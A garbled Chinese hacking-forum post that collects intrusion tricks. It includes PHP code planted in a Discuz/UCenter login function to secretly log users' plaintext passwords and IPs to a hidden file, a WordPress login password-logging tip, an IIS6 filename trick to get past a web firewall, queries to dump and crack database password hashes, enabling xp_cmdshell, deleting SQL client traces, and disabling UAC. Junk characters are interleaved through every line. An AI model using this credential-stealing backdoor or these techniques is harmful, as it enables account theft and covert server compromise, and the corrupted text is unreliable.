" |# F: G' s \: q. f当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
2 f9 n0 c- r" F9 F u" W% V) M就是搜索case ‘login’# `/ ]4 \7 X7 n. }. d& J; d
在它下面直接插入即可,记录的密码生成在pwd.txt中,5 }( k T d9 ]9 i, y
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
( |6 [ f2 L1 {: k6 j. x利用II6文件解析漏洞绕过安全狗代码:
8 E& |# }2 w& X3 B9 u* w: s7 S;antian365.asp;antian365.jpg0 X M, j* q4 N4 P' |
; g2 A! s8 e+ |8 _* O) n各种类型数据库抓HASH破解最高权限密码!# T. t7 |! y, Y
1.sql server20006 {( E( o2 }; G K5 a3 L$ N# i: h
SELECT password from master.dbo.sysxlogins where name='sa'
5 j( ^/ a+ y4 b$ {; Z2 V) o0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503418 p) \4 H, }8 ]' e$ p
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A* @: \7 v% d# g* {/ f9 o7 f: V- |
i g+ Y$ M7 W0×0100- constant header
8 P1 ]' N5 q9 \; W; l1 x34767D5C- salt
' n& `; y' G5 ]9 I8 |" E0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash. W7 a( ]$ r! h9 B$ }# \
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash. {3 C" P0 T0 g; ]+ V; I8 O5 L# E/ V2 @
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash7 n7 s$ D0 S3 h
SQL server 2005:-
, ~0 u9 W9 X6 S& f" e. o4 [0 MSELECT password_hash FROM sys.sql_logins where name='sa'
, |) J) b- t3 n, [4 U0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F1 p2 O! z6 l0 S
0×0100- constant header/ h, \1 `& \0 z( b; B" T+ ~( ^
993BF231-salt9 X% s% v8 J- R6 H0 Q
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
6 s! W" L$ V# q- g+ p( ^crack case sensitive hash in cain, try brute force and dictionary based attacks.
+ b+ C, V# v' e, K7 @" n
9 r$ {/ g( @- F/ _1 V/ Fupdate:- following bernardo’s comments:-) B& j! ?1 M+ s! K' }) @( S
use function fn_varbintohexstr() to cast password in a hex string.
7 ~7 v! D+ S+ N( we.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
( N( |* n* _. C+ |3 e5 k" q, i0 x0 Z
MYSQL:-+ {: V4 M% h: m9 X( b
! ~5 o; K! L7 n5 k0 a7 MIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
4 n/ @- y* _6 A9 x+ l2 d; _6 z' L8 ?7 w4 |; X
*mysql < 4.16 d8 q) y/ ]7 Z: @
) |+ |- o$ M' W6 Y* K. q8 xmysql> SELECT PASSWORD(‘mypass’);
7 V* [& _6 K$ C3 z9 @( k) m) C+——————–+0 w/ l2 O, z' f& C! @
| PASSWORD(‘mypass’) |
) B6 \4 H8 p4 d! H8 N+——————–+& U3 G2 a& Q2 s8 I$ P
| 6f8c114b58f2ce9e |+ G) }) r8 n6 r/ V
+——————–+ k, `. u% P4 F+ m+ _
/ t0 n. w% r" O( z+ m0 p5 ^*mysql >=4.1. a; [7 B# K) F: H- o" i
2 D" l) x& a1 R% |mysql> SELECT PASSWORD(‘mypass’);: o6 q3 ^% j( ^' n
+——————————————-+
+ b$ \3 `( t- j4 m# Q; ~* @ M! _| PASSWORD(‘mypass’) |
! M c% Y" J# W4 T2 }" R, P6 C+——————————————-+1 s6 P5 \- ^: @+ `4 R) P
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
( N4 E9 ^& j" ?+——————————————-++ P n- [2 j8 ]! s8 R+ ]" s- T
+ z" w1 u7 c' N, k( x' {Select user, password from mysql.user- q" F" [8 K3 x8 W( t; I1 Y
The hashes can be cracked in ‘cain and abel’/ K" U8 D" C0 M9 G4 M
# B- z5 J z( u; ?9 B1 H- n
Postgres:-
( Y g2 V9 m: J9 T1 yPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)3 \! Z* Q; J' d# @* \" x
select usename, passwd from pg_shadow;3 G0 F( d" M5 h% A) A- x; m
usename | passwd
0 g6 @0 P3 `5 {——————+————————————-1 N/ Z* k% X7 c, K5 p) {2 G+ ]
testuser | md5fabb6d7172aadfda4753bf0507ed43967 A3 a4 W, G6 i0 }) z4 P Y
use mdcrack to crack these hashes:-
& Q0 E9 w: o" W1 `. O) J- o/ e$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43963 i% t+ Z6 L& o! J5 }) S
3 x# I4 f$ t' x' R& K& |
Oracle:-5 u" V& a7 A2 q/ K. x, {+ Q
select name, password, spare4 from sys.user$* |1 i7 E' V9 O! X( T* o( N) ?
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g H( a5 _3 K7 p. k7 _8 P9 l
More on Oracle later, i am a bit bored….
3 o5 U' Q( x* N/ H( `7 [2 S- i4 g w7 u) j# I
9 l& D( \" w) H* G: E
在sql server2005/2008中开启xp_cmdshell
^* v4 }" p& @-- To allow advanced options to be changed.
- M1 u0 Q, P" U% `4 T" Y; h* w" D) |EXEC sp_configure 'show advanced options', 1- C. I/ e2 C. ~/ c) y
GO
5 J0 S1 l- N) o3 Z E5 s-- To update the currently configured value for advanced options.$ D2 s# J; }# Q3 s# S4 m- `3 z
RECONFIGURE
/ n$ [. N! I6 t$ mGO
$ G7 Y; b8 ? x) q3 E-- To enable the feature.
% K9 f( b! X$ N0 ?( l) sEXEC sp_configure 'xp_cmdshell', 1
) A: t3 j9 E0 JGO$ H4 Z0 Z7 r9 o( {) ~8 z
-- To update the currently configured value for this feature., _* d- c* U, O/ y& k
RECONFIGURE
4 A7 ^5 g1 m* L1 {GO1 W5 F9 i, w- W. R
SQL 2008 server日志清除,在清楚前一定要备份。
0 `& Q, {6 p7 D( _" M9 l/ C如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:: w7 A/ O9 ^4 o" b
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin" ^ y* q* S. x" x; J9 P$ p
. B, [' p- K) [/ B/ h
对于SQL Server 2008以前的版本:
9 C# y( p8 @+ T) LSQL Server 2005:) n' Q* m+ P) s8 ?2 F4 n
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat1 z, H4 ?0 X1 s' z
SQL Server 2000:
; k, o5 y/ E! G! w清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
( Z- L# |: ]* H; N0 m+ `2 x
1 w7 G* N$ v( H3 X本帖最后由 simeon 于 2013-1-3 09:51 编辑
! ?2 D! ^" t4 f1 k$ Y
- M3 V' T4 A) E; j/ V; j- E! {& N. w. _2 V9 B
windows 2008 文件权限修改/ j5 i0 F) J; N
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
- B0 g' |) Z$ [8 J6 \- d2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
* b: h1 W; D. f一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
! u3 t W4 n4 f! h8 Q/ i0 l6 m* s* j, g# T% e2 K
Windows Registry Editor Version 5.00
1 y! F1 a4 K8 z[HKEY_CLASSES_ROOT\*\shell\runas]2 G/ _" g9 b4 g" A. K
@="管理员取得所有权"
& g8 f) F$ f$ g5 y"NoWorkingDirectory"=""
+ s8 G2 }3 A# n5 F. E7 I) R4 R[HKEY_CLASSES_ROOT\*\shell\runas\command]6 `1 M9 u( {( a: h/ F1 d8 q& A
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
6 E8 C% \& A9 D2 u. Y3 S"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
7 u b5 |2 S* v7 @3 A$ ^8 @3 N+ o[HKEY_CLASSES_ROOT\exefile\shell\runas2]! B4 A; ` `% x. A
@="管理员取得所有权"4 N1 P$ u) B2 s' `6 y% O( A
"NoWorkingDirectory"=""
1 A @. u; w p/ Q- V; C[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]6 P0 r# c6 I. }: m; ^& ^
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F", Z$ p) R2 F) l0 Z8 D- f
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
* Z) b+ e% ~8 s0 d; e! n& V! [. ?5 |& B$ o' E8 [" C
[HKEY_CLASSES_ROOT\Directory\shell\runas]
; {1 ]( H1 D3 W' C o* B@="管理员取得所有权"; s, i+ \/ V- _: j* K
"NoWorkingDirectory"="": F* y7 V; d" s1 m
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
, N( `8 f! c6 H" a$ n@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t") A# f/ _) B& A( r, l/ v5 ^! V
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"4 ~* @. s( l- t6 w n
5 E7 d4 k5 e) ~
" R4 ~. \( k# p! ]/ Q* jwin7右键“管理员取得所有权”.reg导入+ g( F, ?) i8 n3 j
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
: Z3 X: h4 {, _5 j0 o* Z: x0 s, P1、C:\Windows这个路径的“notepad.exe”不需要替换
- \& Z$ y9 u* b7 {7 J* h: ]# R2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
8 M/ c7 v; i# u' d! Z3、四个“notepad.exe.mui”不要管
! D+ Q# [# I& ?( g$ p4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和; r C$ K/ W3 L9 W' o. J6 S) l
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
# S' e- b: t0 W替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,; G# v' a* b. D
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
: d0 d* q% J0 X5 e$ W, Xwindows 2008中关闭安全策略:
. j1 z7 X3 [6 _; x3 hreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f- v4 r4 ]3 D: u9 {- \$ K# _
修改uc_client目录下的client.php 在/ F! j5 R4 B8 U* b7 W
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {2 Z* i2 @% e- u7 Z
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php1 P' ~! G6 c9 ~
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw$ D7 n; j7 W- ~( G
if(getenv('HTTP_CLIENT_IP')) {1 S/ h2 v' @ l8 e# A5 \
$onlineip = getenv('HTTP_CLIENT_IP');6 B- [- _; u4 ?1 u6 x
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {- C' x- {2 q4 ~# A' c, @4 C( ?. ?
$onlineip = getenv('HTTP_X_FORWARDED_FOR');$ |7 ^, I, q+ c
} elseif(getenv('REMOTE_ADDR')) {; j& F w7 o* `7 m% }" X# \
$onlineip = getenv('REMOTE_ADDR');3 r2 \( ?& s* i; X2 {
} else {6 s: H6 W8 {$ m( R
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];% D2 a, B) ?* r/ C( ^4 n
}
9 p( l e- W6 s $showtime=date("Y-m-d H:i:s");$ U1 k2 A) ~/ A5 f
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";/ N" z. ^& k* t% m" j
$handle=fopen('./data/cache/csslog.php','a+');
1 I2 {% E/ K! T5 c5 x9 x& r $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对